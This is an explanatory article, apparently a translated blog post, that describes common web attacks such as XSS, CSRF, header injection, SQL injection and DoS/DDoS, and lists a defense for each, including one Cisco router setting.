Common web attack methods and corresponding defenses

XSS (Cross Site Scripting Attack)

Introduction:

XSS attack (Cross Site Scripting) usually refers to the use of loopholes left during web development to inject malicious instruction codes into web pages through clever methods, so that users can load and execute web programs maliciously created by attackers. These malicious web programs are usually JavaScript, but in fact they can also include Java, VBScript, ActiveX, Flash or even plain HTML. After the attack is successful, the attacker may obtain various content including but not limited to higher permissions (such as performing some operations), private web content, sessions, and cookies.

classification:

• Storage type: The attacker enters some data and stores it in the database. Other viewers will be attacked when they see it.
• Reflective: Put the attack code in the request parameter of the URL address.

Defense method:

• HttpOnly: This attribute can prohibit Javascript of the browser page from accessing cookies with the HttpOnly attribute, so as to prevent XSS attackers from stealing cookies.
• Input and output inspection: filter and disinfect the input data, filter any data input by the user, and escape some special characters.

CSRF (Cross Site Request Forgery)

Introduction:
CSRF (Cross-site request forgery), also known as "one click attack" or session riding, usually abbreviated as CSRF or XSRF, is a malicious use of websites. It can be understood as follows: attacker Misappropriating your identity and sending a malicious request in your name. This request is completely legal to the server, but it has completed an operation expected by the attacker, such as sending emails, sending messages in your name, or stealing Your account, add system administrators, even purchase goods, virtual currency transfers, etc.

Defense method:

• Verify the HTTP Referer field: This field records the source address of the HTTP request
• Add token to the request address and verify
• Customize attributes in HTTP headers and verify
• Use verification code

Http Heads attack

Introduction:
Anyone who uses a browser to view any WEB website, no matter what technology and framework your WEB website adopts, all use the HTTP protocol.
In the HTTP protocol, there is a blank line between Response header and content, that is, two sets of CRLF (0x0D 0A) characters. This blank line marks the end of headers and the beginning of content. A "smart" attacker can take advantage of this. As long as the attacker has a way to "inject" arbitrary characters into the headers, this kind of attack can happen.

Defense mode:
filter all response headers, remove illegal characters appearing in the header

SQL injection

Introduction:
SQL injection means that the web application does not judge the legality of the user input data or does not filter strictly. The attacker can add additional SQL statements to the end of the pre-defined query statement in the web application, in the administrator Unknowingly implement illegal operations, in order to deceive the database server to perform unauthorized arbitrary queries, thereby further obtaining corresponding data information.

Defense method:

• Basic filtering and secondary filtering : Check user input to ensure the safety of data input. When checking input or submitted variables, convert or filter characters such as single quotes, double quotes, colons, etc., so as to effectively prevent SQL injection .
• Hierarchical management : perform hierarchical management of users and strictly control user permissions. For ordinary users, it is forbidden to grant database creation, deletion, and modification permissions. Only the system administrator has the permissions to add, delete, modify, and check.
• Parameter passing value : It is forbidden to write variables directly into the SQL statement, and the relevant variables must be passed by setting the corresponding parameters. So as to suppress SQL injection. Data input cannot be directly embedded in the query statement. At the same time, it is necessary to filter the input content and filter out unsafe input data.
• Database information encryption
• Multi-layer verification

DOS attack (denial of service attack)

Introduction:

DOS is the abbreviation of Denial of Service, that is, denial of service. Attacks that cause DoS are called DoS attacks, and their purpose is to make computers or networks unable to provide normal services.

Common DOS attack methods and prevention:

• SYN Flood attack The
  first method is to shorten the SYN Timeout time.
  The second method is to set the SYN Cookie , which is to assign a Cookie to each IP address requesting a connection. If repeated SYN packets from a certain IP are received in a short period of time, then It is determined that it is under attack, and all packets from this IP address will be discarded in the future.

• Smurf attack
  Configure the following on the cisco router to prevent the packet from being delivered to the broadcast address: Router(config-if)# no ip directed-broadcast

• Ping of Death

• Teardrop attack

DDOS attack (distributed denial of service attack)

Introduction:

Distributed Denial of Service (Distributed Denial of Service), in short, is to send a large number of requests to paralyze the server. The DDos attack is based on the DOS attack, which can be understood in a popular way. Dos is a heads-up and ddos ​​is a group fight

Defense method:

• Increase bandwidth
• Optimize routing and network structure
• Install a firewall system in the system
• Improve the quality of network management personnel